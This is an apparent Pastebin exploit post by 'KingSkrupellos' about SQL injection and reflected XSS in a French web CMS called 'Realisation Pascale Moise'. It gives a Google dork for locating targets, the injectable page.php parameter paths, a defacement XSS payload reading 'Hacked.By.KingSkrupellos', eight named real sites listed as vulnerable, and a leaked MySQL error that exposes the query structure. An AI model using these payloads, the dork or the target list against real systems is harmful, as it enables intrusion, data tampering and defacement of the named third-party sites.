Advertisement
KingSkrupellos

Realisation Pascale Moise XSS SQL Injection

Oct 6th, 2019
114
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.35 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Realisation Pascale Moise XSS SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 07/10/2019
  7. # Vendor Homepage : pascalemoise.fr
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:réalisation pascale moise
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. CWE-79 [ Improper Neutralization of Input During
  15. Web Page Generation ('Cross-site Scripting') ]
  16. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  17. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  18. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  19.  
  20. ###################################################################
  21.  
  22. # Impact :
  23. ***********
  24. Realisation Pascale Moise is prone to an SQL-injection
  25. vulnerability because it fails to sufficiently sanitize user-supplied data before using
  26. it in an SQL query. Exploiting this issue could allow an attacker to compromise the
  27. application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  28. A remote attacker can send a specially crafted request to the vulnerable application and
  29. execute arbitrary SQL commands in application`s database. Further exploitation of this
  30. vulnerability may result in unauthorized data manipulation.
  31. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  32.  
  33. Reflected XSS (or Non-Persistent) :
  34. ***************************************
  35. The server reads data directly from the HTTP request and reflects it back in the HTTP response.
  36. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content
  37. to a vulnerable web application, which is then reflected back to the victim and executed by the
  38. web browser. The most common mechanism for delivering malicious content is to include
  39. it as a parameter in a URL that is posted publicly or e-mailed directly to the victim.
  40. URLs constructed in this manner constitute the core of many phishing schemes, whereby
  41. an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects
  42. the attacker's content back to the victim,the content is executed by the victim's browser.
  43.  
  44. ###################################################################
  45.  
  46. # SQL Injection Exploit :
  47. **********************
  48. /page.php?ope=preview&type_content=news&id=[SQL Injection]
  49.  
  50. /page.php?ope=preview&typ=news&tbl=places&id_theme=[ID-NUMBER]&id=[SQL Injection]
  51.  
  52. # Cross Site Scripting XSS Exploit :
  53. ********************************
  54. /page.php?ope=preview&typ=news&tbl=places&id_theme=5&id=1%27<marquee>
  55. <font%20color=lime%20size=32>Hacked.By.KingSkrupellos</font></marquee>
  56.  
  57. ###################################################################
  58.  
  59. # Example Vulnerable Sites :
  60. *************************
  61. [+] combe-abondance.com/page.php?ope=preview&type_content=news&id=1%27
  62.  
  63. [+] ville-leslilas.fr/page.php?ope=preview&typ=news&tbl=places&id_theme=5&id=1%27
  64.  
  65. [+] lacourgettesolidaire.fr/page.php?ope=preview&type_content=news&id=1%27
  66.  
  67. [+] lebureaudetudes.fr/page.php?ope=preview&type_content=news&id=1%27
  68.  
  69. [+] la-sdi.net/assisesdelareussite/page.php?ope=preview&type_content=news&id=1%27
  70.  
  71. [+] galivel.com/page.php?ope=preview&type_content=news&id=1%27
  72.  
  73. [+] adage-environnement.com/page.php?ope=preview&type_content=news&id=1%27
  74.  
  75. [+] theatredugardechasse.fr/page.php?ope=preview&type_content=news&id=1%27
  76.  
  77. ###################################################################
  78.  
  79. # Example SQL Database Error :
  80. ****************************
  81. SELECT p.*,n.*, t.theme,p.title AS place FROM news_places_ok AS n LEFT
  82. OUTER JOIN annu_themes AS t ON (n.id_theme=t.id_unique) LEFT OUTER JOIN
  83. annu_places_ok AS p ON (n.id_place=p.id_unique) WHERE n.valid LIKE 'ok' AND
  84. (date_par<= NOW() OR date_par =0) AND (date_for>= NOW() OR date_for =0)
  85. AND n.id_unique=1\' You have an error in your SQL syntax; check the manual that
  86. corresponds to your MySQL server version for the right syntax to use near '\'' at line 8
  87.  
  88. ###################################################################
  89.  
  90. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  91.  
  92. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement